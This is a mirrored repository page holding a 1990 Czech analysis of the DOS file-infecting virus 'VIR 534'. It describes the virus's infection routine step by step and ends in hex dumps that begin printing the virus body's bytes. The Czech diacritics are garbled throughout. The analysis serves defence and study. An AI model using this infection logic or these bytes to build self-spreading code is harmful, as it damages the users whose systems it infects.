Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-30 19:02:32 +00:00
Code Releases Activity
6e867b6ce0
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.plumbum.asm

1013 lines
57 KiB
NASM
Raw Normal View History

Add files via upload
2021-01-12 23:55:26 +00:00
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
[[ ]]
[[ VIR 534 ]]
[[ ]]
[[ 5.5.1990 Nov<EFBFBD> Mesto nad V<EFBFBD>hom Ing.Vladim<EFBFBD>r Mat<EFBFBD>jka ]]
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
Charakteristika v<EFBFBD>ru:
---------------------
V<EFBFBD>r 534 je ozna<EFBFBD>en podle d<EFBFBD>lky o kterou zv<EFBFBD>t<EFBFBD>uje p<EFBFBD>vodn<EFBFBD> d<EFBFBD>lku
souboru. Velmi rychle se roz<EFBFBD>i<EFBFBD>uje v souborech typu *.COM, zejm<EFBFBD>na
pomoc<EFBFBD> syst<EFBFBD>mov<EFBFBD>ho souboru COMMAND.COM. <EFBFBD><EFBFBD>dn<EFBFBD> dal<EFBFBD><EFBFBD> manipula<EFBFBD>n<EFBFBD>
<EFBFBD>innost nebyla rozborem prok<EFBFBD>z<EFBFBD>na.
Roz<EFBFBD><EFBFBD><EFBFBD>en<EFBFBD> v<EFBFBD>ru na souboru typu:
-------------------------------
- soubory typu *.COM;
- napad<EFBFBD> i soubory s nastaven<EFBFBD>m atributem H (skryt<EFBFBD>) nebo RO (pouze ke <EFBFBD>ten<EFBFBD>)
- napad<EFBFBD> COMMAND.COM.
P<EFBFBD><EFBFBD>znaky p<EFBFBD><EFBFBD>tomnosti v<EFBFBD>ru v souboru:
------------------------------------
- d<EFBFBD>lka souboru je zv<EFBFBD>t<EFBFBD>ena + 534 byte;
- datum vytvo<EFBFBD>en<EFBFBD> souboru je nastaven na 13. m<EFBFBD>s<EFBFBD>c;
- zru<EFBFBD>en p<EFBFBD>vodn<EFBFBD> nastaven<EFBFBD> atribut souboru RO;
- p<EFBFBD>i zalepen<EFBFBD> disket<EFBFBD> hl<EFBFBD><EFBFBD>en<EFBFBD> " Write protect error writing drive A
Abort, Retry, Fail? ".
Podm<EFBFBD>nky aktivizace v<EFBFBD>ru:
-------------------------
V<EFBFBD>dy p<EFBFBD>i startu infikovan<EFBFBD>ho programu dojde k roz<EFBFBD><EFBFBD><EFBFBD>en<EFBFBD> v<EFBFBD>ru 534
na dal<EFBFBD><EFBFBD> soubor za t<EFBFBD>chto podm<EFBFBD>nek:
- minim<EFBFBD>ln<EFBFBD> verze DOS 2.00;
- soubor mus<EFBFBD> b<EFBFBD>t typu *.COM;
- soubor nesm<EFBFBD> m<EFBFBD>t nastaven atribut S (systemov<EFBFBD>);
- soubor mus<EFBFBD> b<EFBFBD>t v podadres<EFBFBD><EFBFBD>i z kter<EFBFBD>ho byl vol<EFBFBD>n infikonan<EFBFBD> soubor,
nebo v hlavn<EFBFBD>m adres<EFBFBD><EFBFBD>i;
- soubor nesm<EFBFBD> obsahovat p<EFBFBD><EFBFBD>znak v<EFBFBD>ru - 13.m<EFBFBD>s<EFBFBD>c;
- soubor mus<EFBFBD> m<EFBFBD>t min. d<EFBFBD>lku 256 byte a nesm<EFBFBD> b<EFBFBD>t v<EFBFBD>t<EFBFBD><EFBFBD> jak 64000 byte.
Manipula<EFBFBD>n<EFBFBD> <EFBFBD>innost v<EFBFBD>ru:
-------------------------
V<EFBFBD>r 534 se pouze velmi rychle roz<EFBFBD>i<EFBFBD>uje, nevykonav<EFBFBD> <EFBFBD><EFBFBD>dnou dal<EFBFBD><EFBFBD>
ni<EFBFBD>ivou <EFBFBD>innost.
U infikovan<EFBFBD>ho souboru m<EFBFBD><EFBFBD>eme ve sv<EFBFBD>m d<EFBFBD>sledku zaznamenat:
- pouze zru<EFBFBD>en<EFBFBD> atribut RO;
- p<EFBFBD><EFBFBD>znak v<EFBFBD>ru - nastaven 13.m<EFBFBD>s<EFBFBD>c;
- p<EFBFBD>ipojen<EFBFBD> mrtv<EFBFBD> v<EFBFBD>r (nen<EFBFBD> adresa skoku na v<EFBFBD>r);
- n<EFBFBD>kazu aktivn<EFBFBD>m v<EFBFBD>rem.
Opravitelnost infikovan<EFBFBD>ho programu:
------------------------------------
V<EFBFBD>r 534 p<EFBFBD>ep<EFBFBD><EFBFBD>e prvn<EFBFBD> 3 byte v infikovan<EFBFBD>m programu, tyto odlo<EFBFBD><EFBFBD> do
sv<EFBFBD>ho z<EFBFBD>pisn<EFBFBD>ku. Oprava infikovan<EFBFBD>ho programu je tedy mo<EFBFBD>n<EFBFBD>.
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
[[ ]]
[[ VIR 534 ]]
[[ 5.5.1990 Ing.Vladim<EFBFBD>r Mat<EFBFBD>jka ]]
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
Pro rozbor <EFBFBD>innosti v<EFBFBD>ru 534 a zji<EFBFBD>t<EFBFBD>n<EFBFBD> jeho ni<EFBFBD>iv<EFBFBD>ch <EFBFBD><EFBFBD>ink<EFBFBD> byl zvolen
n<EFBFBD>sledn<EFBFBD> postup, kter<EFBFBD> je v p<EFBFBD><EFBFBD>loh<EFBFBD>ch zdokumentov<EFBFBD>n.
Odchycen<EFBFBD> vzorku v<EFBFBD>ru 534 bylo proveden<EFBFBD> na jednoduch<EFBFBD>m programu T.COM,
kter<EFBFBD> m<EFBFBD> za <EFBFBD>kol pouze vytisknout znaky '*' na obrazovce.
Rozbor a zdokumentov<EFBFBD>n<EFBFBD> v<EFBFBD>ru je proveden<EFBFBD> na osobn<EFBFBD>m po<EFBFBD><EFBFBD>ta<EFBFBD>i PP 06 pod
opera<EFBFBD>n<EFBFBD>m syst<EFBFBD>mem MS DOS 3.30.
a/ V<EFBFBD>pis obsahu p<EFBFBD>ipraven<EFBFBD> diskety pro rozbor v<EFBFBD>ru.
------------------------------------------------
V prvn<EFBFBD> <EFBFBD><EFBFBD>sti se zam<EFBFBD><EFBFBD><EFBFBD>me na p<EFBFBD><EFBFBD>znaky p<EFBFBD><EFBFBD>tomnosti v<EFBFBD>ru 534 v souborech.
Jako z<EFBFBD>kladn<EFBFBD> prost<EFBFBD>edek byl zvolen roz<EFBFBD><EFBFBD><EFBFBD>en<EFBFBD> PCTOOLS 4.20. V p<EFBFBD><EFBFBD>loze
PCTOOLS/1 je uveden tento v<EFBFBD>pis obsahu diskety:
T COM 4110 1-01-80 12:59a
T534 COM 4644 13-01-80 12:59a
Program T.COM je p<EFBFBD>vodn<EFBFBD>, dobr<EFBFBD> program. Program T534.COM je naka<EFBFBD>en v<EFBFBD>rem
534. Z uveden<EFBFBD>ho v<EFBFBD>pisu je na prvn<EFBFBD> pohled vid<EFBFBD>t tyto zm<EFBFBD>ny:
- zm<EFBFBD>na d<EFBFBD>lky 4644 - 4110 = + 534 byte;
- zm<EFBFBD>na v datumu - 13.m<EFBFBD>s<EFBFBD>c !!!! (p<EFBFBD><EFBFBD>znak v<EFBFBD>ru).
b/ Kontrola obsahu adresa<EFBFBD>e diskety.
---------------------------------
Na z<EFBFBD>klad<EFBFBD> bodu a/ provedeme kontrolu adres<EFBFBD><EFBFBD>e diskety s d<EFBFBD>razem na rozbor
datumu vytvo<EFBFBD>en<EFBFBD> souboru, v<EFBFBD>pis v p<EFBFBD><EFBFBD>loze PCTOOLS/2.
- dobr<EFBFBD> program T.COM
-------------------
0000(0000) 54 20 20 20 20 20 20 20 43 4F 4D 20 00 00 00 00 T COM
0016(0010) 00 00 00 00 00 00 65 07|21 00|02 00 0E 10 00 00
datum ->|-----|
0021 = 0000 0000 0010 0001
|------||---||----|--- den 1.
| |--------- m<EFBFBD>s<EFBFBD>c 1.
|-------------- rok 00 = 1980
- program T534.COM naka<EFBFBD>en v<EFBFBD>rem 534
----------------------------------
0032(0020) 54 35 33 34 20 20 20 20 43 4F 4D 20 00 00 00 00 T534 COM
0048(0030) 00 00 00 00 00 00 65 07|A1 01|07 00 24 12 00 00
datum ->|-----|
01A1 = 0000 0001 1010 0001
|------||---||----|--- den 1.
| |--------- m<EFBFBD>s<EFBFBD>c 13. - p<EFBFBD><EFBFBD>znak v<EFBFBD>ru 534
|-------------- rok 00 = 1980
c/ Popis funkce programu T.COM.
---------------------------
V p<EFBFBD><EFBFBD>loze PCTOOLS/3,4 je uveden v<EFBFBD>pis prvn<EFBFBD>ho a posledn<EFBFBD>ho sektoru programu
T.COM. Pro dal<EFBFBD><EFBFBD> rozbor je pot<EFBFBD>ebn<EFBFBD> si v<EFBFBD>imnout hodnot prvn<EFBFBD>ch 3 byte (0E1FBA).
V<EFBFBD>echny d<EFBFBD>le neuveden<EFBFBD> sektory tohoto programu obsahuj<EFBFBD> pouze znaky '*'.
Program kon<EFBFBD><EFBFBD> k<EFBFBD>dem 24H.
Pro <EFBFBD>pnost uv<EFBFBD>d<EFBFBD>m v<EFBFBD>pis funkce programu T.COM odpov<EFBFBD>daj<EFBFBD>c<EFBFBD> uveden<EFBFBD>m
p<EFBFBD><EFBFBD>loh<EFBFBD>m.
Path=A:\*.*
File=T.COM Relative sector 0000000, Clust 00002, Disk Abs Sec 0000012
Displacement ----------------- Hex codes-------------------- ASCII value
0000(0000) 0E 1F BA 0D 01 B4 09 CD 21 B4 4C CD 21 2A 2A 2A ***
AX=0000 BX=0000 CX=1296 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000
DS=156A ES=156A SS=156A CS=156A IP=0100 NV UP EI PL NZ NA PO NC
156A:0100 0E PUSH CS
156A:0101 1F POP DS ;nastavit DS
156A:0102 BA0D01 MOV DX,010D ;ukazatel zacatku textu
156A:0105 B409 MOV AH,09 ;funkce - tisk textu
156A:0107 CD21 INT 21 ;sluzba DOSu
156A:0109 BE4C MOV AH,4C ;funkce - ukoncit
156A:010B CD21 INT 21 ;sluzba DOSu
156A:010D 2A2A DW '**' ;zacatek textu
:
:
156A:110B 2A2A DW '**'
156A:110D 24 DB '$' ;konec textu
d/ Kontrola programu T534.COM.
---------------------------
V porovn<EFBFBD>n<EFBFBD> s programem T.COM vid<EFBFBD>me v p<EFBFBD><EFBFBD>loze PCTOOLS/5,6,7,8 zm<EFBFBD>ny, kter<EFBFBD>
provede v<EFBFBD>r p<EFBFBD>i n<EFBFBD>kaze. Na za<EFBFBD><EFBFBD>tku programu T.COM je zm<EFBFBD>na prvn<EFBFBD>ch 3 byte,
p<EFBFBD><EFBFBD>loha PCTOOLS/5. Za konec programu T.COM, p<EFBFBD><EFBFBD>loha PCTOOLS/6, je p<EFBFBD>ipojen v<EFBFBD>r
534. Jednoduchou kontrolou zjist<EFBFBD>me, <EFBFBD>e p<EFBFBD>vodn<EFBFBD> program je del<EFBFBD><EFBFBD> o 534 byte.
e/ Kontrola naka<EFBFBD>en<EFBFBD>ho programu T534.COM pomoc<EFBFBD> programu SYMDEB.
-------------------------------------------------------------
Pro podrobn<EFBFBD>j<EFBFBD>i rozbor v<EFBFBD>ru 534 je naka<EFBFBD>en<EFBFBD> program T534.COM zaveden do
pam<EFBFBD>ti po<EFBFBD><EFBFBD>ta<EFBFBD>e PP 06. V p<EFBFBD><EFBFBD>loze SYMDEB/1 je proveden v<EFBFBD>pis programu v pam<EFBFBD>ti.
Nyn<EFBFBD> ji<EFBFBD> p<EFBFBD>esn<EFBFBD> vid<EFBFBD>me z<EFBFBD>kladn<EFBFBD> zp<EFBFBD>sob p<EFBFBD>ipojen<EFBFBD> v<EFBFBD>ru k na<EFBFBD>emu programu.
Na za<EFBFBD><EFBFBD>tku programu T.COM p<EFBFBD>epsal v<EFBFBD>r prvn<EFBFBD> 3 byte instrukc<EFBFBD> skoku za napaden<EFBFBD>
program, kde je ulo<EFBFBD>en<EFBFBD> vlastn<EFBFBD> t<EFBFBD>lo v<EFBFBD>ru, z<EFBFBD>pisn<EFBFBD>k a DTA.
f/ Rozbor <EFBFBD>innosti v<EFBFBD>ru 534.
-------------------------
VIR_534 odlo<EFBFBD>il ze za<EFBFBD><EFBFBD>tku programu T.COM prvn<EFBFBD> 3 byte do sv<EFBFBD>ho z<EFBFBD>pisn<EFBFBD>ku.
Na toto m<EFBFBD>sto zapsal adresu skoku na vlastn<EFBFBD> VIR_534, kter<EFBFBD> p<EFBFBD>ipojil na konec
programu T.COM. Po startu infikovan<EFBFBD>ho programu T534.COM v<EFBFBD>r nejd<EFBFBD><EFBFBD>ve provede
opravu prvn<EFBFBD>ch 3 byte programu T.COM. Po realizaci programu v<EFBFBD>ru VIR_534 spust<EFBFBD>
vlastn<EFBFBD>, ji<EFBFBD> neporu<EFBFBD>en<EFBFBD> program T.COM.
Struktura infikovan<EFBFBD>ho programu T534.COM
----------------------------------------
|=======================================|
|----JMP VIR_534 | |
| |--------------| |
| | |
| | |
| | P<EFBFBD>vodn<EFBFBD> dobr<EFBFBD> program T.COM |
| | |
| | |
| |=======================================|==|
|---> | |
| | |
| VIR_534 | |
| |+534 byte
| | |
|---------------------------------------| |
| Zapisn<EFBFBD>k VIRu_534 | |
| DTA VIRu_534 | |
|=======================================|==|
Hlavn<EFBFBD> algoritmus <EFBFBD>innosti v<EFBFBD>ru 534.
------------------------------------
Komentovan<EFBFBD> popis programu v<EFBFBD>ru 534 je uveden v p<EFBFBD><EFBFBD>loze SYMDEB/2.
- Obnovit p<EFBFBD>vodn<EFBFBD> program T.COM - vr<EFBFBD>tit 3 byte na za<EFBFBD><EFBFBD>tek.
Oprava se provad<EFBFBD> p<EFBFBD>esunem p<EFBFBD>vodn<EFBFBD>ch 3 byte ze z<EFBFBD>pisn<EFBFBD>ku na za<EFBFBD><EFBFBD>tek napaden<EFBFBD>ho
programu CS:0100, nyn<EFBFBD> je zde instrukce pro skok na za<EFBFBD><EFBFBD>tek VIRu_534.
- Zjistit verzi DOSu - pro ni<EFBFBD><EFBFBD><EFBFBD> verzi jak 2.0 - skok na p<EFBFBD>vodn<EFBFBD> T.COM.
- Nastavit novou adresu DTA pro p<EFBFBD>enosy z disku do z<EFBFBD>pisn<EFBFBD>ku v<EFBFBD>ru.
- Vyhledat po<EFBFBD>adovan<EFBFBD> soubor *.COM.
Program vyhled<EFBFBD> prvn<EFBFBD> soubor odpovidaj<EFBFBD>c<EFBFBD> specifikaci (????????.COM00)
s atributem souboru mimo S (systemov<EFBFBD>). Po vyhledan<EFBFBD> se napn<EFBFBD> aktu<EFBFBD>ln<EFBFBD> oblast
DTA. Pokud nen<EFBFBD> soubor *.COM nalezen v aktu<EFBFBD>ln<EFBFBD>m podadres<EFBFBD><EFBFBD>i, je nastavena
cesta do hlavn<EFBFBD>ho adres<EFBFBD><EFBFBD>e.
- Kontrola datumu a d<EFBFBD>lky vyhledan<EFBFBD>ho souboru *.COM.
Pokud je v datumu vytvo<EFBFBD>en<EFBFBD> souboru nastaven 13.m<EFBFBD>s<EFBFBD>c !!! - p<EFBFBD><EFBFBD>znak v<EFBFBD>ru,
vyhled<EFBFBD> se dal<EFBFBD><EFBFBD> soubor v adres<EFBFBD><EFBFBD>i. Pokud d<EFBFBD>lka vyhledan<EFBFBD>ho souboru je men<EFBFBD><EFBFBD>
256 byte nebo je rovna, v<EFBFBD>t<EFBFBD>i 64000 byte, vyhled<EFBFBD> se dal<EFBFBD><EFBFBD> soubor v adres<EFBFBD><EFBFBD>i.
P<EFBFBD>esun specifikace a parametr<EFBFBD> vyhledan<EFBFBD>ho souboru z DTA do zapisn<EFBFBD>ku v<EFBFBD>ru.
- Zjistit atributy souboru - zru<EFBFBD>it atribut RO.
- Otev<EFBFBD><EFBFBD>t soubor pro <EFBFBD>ten<EFBFBD> a z<EFBFBD>pis.
- Zjistit <EFBFBD>as a datum vytvo<EFBFBD>en<EFBFBD> souboru, ulo<EFBFBD>it do z<EFBFBD>pisn<EFBFBD>ku.
- Na<EFBFBD><EFBFBD>st ze za<EFBFBD><EFBFBD>tku souboru prvn<EFBFBD> 3 byte, ulo<EFBFBD>it do z<EFBFBD>pisn<EFBFBD>ku.
- Nastavit sm<EFBFBD>rn<EFBFBD>k na konec souboru, v<EFBFBD>po<EFBFBD>et offset adresy skoku na v<EFBFBD>r.
Adresa skoku se vypo<EFBFBD><EFBFBD>t<EFBFBD> z d<EFBFBD>lky programu T.COM - 3 byte (JMP offset VIR_534).
- Z<EFBFBD>pis VIRu_534 na konec souboru - mrtv<EFBFBD> v<EFBFBD>r.
- Nastavit sm<EFBFBD>rn<EFBFBD>k na za<EFBFBD><EFBFBD>tek souboru.
- Z<EFBFBD>pis offset adresy skoku na VIR_534 na za<EFBFBD><EFBFBD>tek souboru - prog. naka<EFBFBD>en.
- Vr<EFBFBD>tit p<EFBFBD>vodn<EFBFBD> <EFBFBD>as vytvo<EFBFBD>en<EFBFBD> souboru.
Nastavit priznak viru - 13.mesic !!!!
Ze z<EFBFBD>pisn<EFBFBD>ku VIRu_534 jsou vybr<EFBFBD>ny p<EFBFBD>vodn<EFBFBD> hodnoty <EFBFBD>asu a datumu vytvo<EFBFBD>en<EFBFBD>
souboru, kter<EFBFBD> byl infikov<EFBFBD>n. <EFBFBD>as je vr<EFBFBD>cen v p<EFBFBD>vodn<EFBFBD> hodnot<EFBFBD>. Hodnota
datumu je zm<EFBFBD>n<EFBFBD>na na 13.m<EFBFBD>s<EFBFBD>c, den a rok z<EFBFBD>stavaj<EFBFBD> bez zm<EFBFBD>ny.
- Uzav<EFBFBD><EFBFBD>t soubor.
- Nastavit adresu DTA pro p<EFBFBD>enosy z disku - offset 80H v PSP.
- Ukon<EFBFBD>en<EFBFBD> <EFBFBD>innosti VIRu_534 - start p<EFBFBD>vodn<EFBFBD>ho programu T.COM.
Seznam a stru<EFBFBD>n<EFBFBD> charakteristika p<EFBFBD><EFBFBD>loh:
----------------------------------------
PCTOOLS/1 - V<EFBFBD>pis adresa<EFBFBD>e diskety.
Obsahuje program: T.COM, d<EFBFBD>lky 4110 byte, dobr<EFBFBD> program.
Obsahuje program: T534.COM, d<EFBFBD>lky 4644 byte, infik. prog. 13.mes<EFBFBD>c.
PCTOOLS/2 - V<EFBFBD>pis adres<EFBFBD><EFBFBD>e diskety - ROOT sektor.
Obsahuje program: T.COM, dobr<EFBFBD> program.
Obsahuje program: T534.COM, infikovan<EFBFBD> program, 13.mesic.
PCTOOLS/3 - V<EFBFBD>pis dobr<EFBFBD>ho programu T.COM - prvn<EFBFBD> rel. sektor.
PCTOOLS/4 - V<EFBFBD>pis dobr<EFBFBD>ho programu T.COM - posledn<EFBFBD> rel. sektor.
PCTOOLS/5 - V<EFBFBD>pis infikovan<EFBFBD>ho programu T534.COM - prvn<EFBFBD> rel. sektror.
Obsahuje dobr<EFBFBD> program T.COM, kde prvn<EFBFBD> 3 byte jsou
p<EFBFBD>eps<EFBFBD>ny instrukci skoku na VIR_534.
PCTOOLS/6 - V<EFBFBD>pis infikovan<EFBFBD>ho programu T534.COM - 8. rel. sektor.
Obsahuje <EFBFBD>adn<EFBFBD> ukon<EFBFBD>en<EFBFBD> programu T.COM a za<EFBFBD><EFBFBD>tek prog. VIR_534.
PCTOOLS/7 - V<EFBFBD>pis infikovan<EFBFBD>ho programu T534.COM - 8. rel. sektor.
Obsahuje ukon<EFBFBD>en<EFBFBD> programu V<EFBFBD>Ru_534, jeho z<EFBFBD>pisn<EFBFBD>k a DTA.
PCTOOLS/8 - V<EFBFBD>pis infikovan<EFBFBD>ho programu T534.COM - 9. rel. sektor.
Obsahuje konec programu VIRu_534.
SYMDEB/1 - V<EFBFBD>pis infikovan<EFBFBD>ho programu T534.COM.
Obsahuje dobr<EFBFBD> program T.COM, sch<EFBFBD>maticky p<EFBFBD>eru<EFBFBD>en s adresou
skoku na VIR_534. V dal<EFBFBD><EFBFBD>m je vypis programu vlastn<EFBFBD>ho VIRu_534
s jeho z<EFBFBD>pisn<EFBFBD>kem a DTA.
SYMDEB/2 - V<EFBFBD>pis infikovan<EFBFBD>ho programu T534.COM.
Obsahuje rozbor <EFBFBD>innosti programu VIRu_534 s popisem jeho
manipula<EFBFBD>n<EFBFBD> <EFBFBD>innosti.
Priloha: PCTOOLS/1
------------------
PC Tools Deluxe R4.20 Vol Label=None
---------------------------------File Functions------------------Scroll Lock OFF
Path=A:\*.*
Name Ext Size #Clu Date Time Attributes
T COM 4110 5 1/01/80 12:59a Normal,Archive
T534 COM 4644 5 13/01/80 12:59a Normal,Archive
|------------------------------------------------------------------------------|
| 2 files LISTed = 8754 bytes. 2 files in sub-dir = 8754 bytes. |
| 0 files SELECTed = 0 bytes. Available on volume = 352256 bytes. |
|------------------------------------------------------------------------------|
| Copy Move cOmp Find Rename Delete Ver view/Edit Attrib Wordp Print List |
|Sort Help =SELECT F1=UNselect F2=alt dir lst F3=other menu Esc=exit PC Tools |
| F8=directory LIST argument F9=file SELECTion argument F10=chg drive/path |
|------------------------------------------------------------------------------|
Priloha: PCTOOLS/2
------------------
PC Tools Deluxe R4.20
------------------------------Disk View/Edit Service----------------------------
Path=A:
Absolute sector 0000005, System ROOT
Displacement ----------------- Hex codes-------------------- ASCII value
0000(0000) 54 20 20 20 20 20 20 20 43 4F 4D 20 00 00 00 00 T COM
0016(0010) 00 00 00 00 00 00 65 07 21 00 02 00 0E 10 00 00
0032(0020) 54 35 33 34 20 20 20 20 43 4F 4D 20 00 00 00 00 T534 COM
0048(0030) 00 00 00 00 00 00 65 07 A1 01 07 00 24 12 00 00
0064(0040) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0080(0050) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0096(0060) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0112(0070) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0128(0080) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0144(0090) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0160(00A0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0176(00B0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0192(00C0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0208(00D0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0224(00E0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0240(00F0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Home=beg of file/disk End=end of file/disk
ESC=Exit PgDn=forward PgUp=back F2=chg sector num F3=edit F4=get name
Priloha: PCTOOLS/3
------------------
PC Tools Deluxe R4.20 Vol Label=None
------------------------------File View/Edit Service----------------------------
Path=A:\*.*
File=T.COM Relative sector 0000000, Clust 00002, Disk Abs Sec 0000012
Displacement ----------------- Hex codes-------------------- ASCII value
0000(0000) 0E 1F BA 0D 01 B4 09 CD 21 B4 4C CD 21 2A 2A 2A ***
0016(0010) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0032(0020) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0048(0030) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0064(0040) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0080(0050) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0096(0060) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0112(0070) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0128(0080) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0144(0090) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0160(00A0) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0176(00B0) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0192(00C0) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0208(00D0) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0224(00E0) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0240(00F0) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
Home=beg of file/disk End=end of file/disk
ESC=Exit PgDn=forward PgUp=back F1=toggle mode F2=chg sector num F3=edit
Priloha: PCTOOLS/4
------------------
PC Tools Deluxe R4.20 Vol Label=None
------------------------------File View/Edit Service----------------------------
Path=A:\*.*
File=T.COM Relative sector 0000008, Clust 00006, Disk Abs Sec 0000020
Displacement ----------------- Hex codes-------------------- ASCII value
0000(0000) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 24 00 00 *************$
0016(0010) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0032(0020) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0048(0030) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0064(0040) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0080(0050) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0096(0060) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0112(0070) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0128(0080) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0144(0090) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0160(00A0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0176(00B0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0192(00C0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0208(00D0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0224(00E0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0240(00F0) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Home=beg of file/disk End=end of file/disk
ESC=Exit PgDn=forward PgUp=back F1=toggle mode F2=chg sector num F3=edit
Priloha: PCTOOLS/5
------------------
PC Tools Deluxe R4.20 Vol Label=None
------------------------------File View/Edit Service----------------------------
Path=A:\*.*
File=T534.COM Relative sector 0000000, Clust 00007, Disk Abs Sec 0000022
Displacement ----------------- Hex codes-------------------- ASCII value
0000(0000) E9 0B 10 0D 01 B4 09 CD 21 B4 4C CD 21 2A 2A 2A ***
0016(0010) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0032(0020) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0048(0030) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0064(0040) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0080(0050) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0096(0060) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0112(0070) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0128(0080) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0144(0090) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0160(00A0) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0176(00B0) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0192(00C0) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0208(00D0) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0224(00E0) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
0240(00F0) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A ****************
Home=beg of file/disk End=end of file/disk
ESC=Exit PgDn=forward PgUp=back F1=toggle mode F2=chg sector num F3=edit
Priloha: PCTOOLS/6
------------------
PC Tools Deluxe R4.20 Vol Label=None
------------------------------File View/Edit Service----------------------------
Path=A:\*.*
File=T534.COM Relative sector 0000008, Clust 00011, Disk Abs Sec 0000030
Displacement ----------------- Hex codes-------------------- ASCII value
0000(0000) 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 24 50 BE *************$
0016(0010) 73 12 8B D6 81 C6 00 00 FC B9 03 00 BF 00 01 F3
0032(0020) A4 8B FA B4 30 CD 21 3C 00 75 03 E9 3F 01 BA 2C
0048(0030) 00 03 D7 8B DA B4 1A CD 21 BD 00 00 8B D7 81 C2
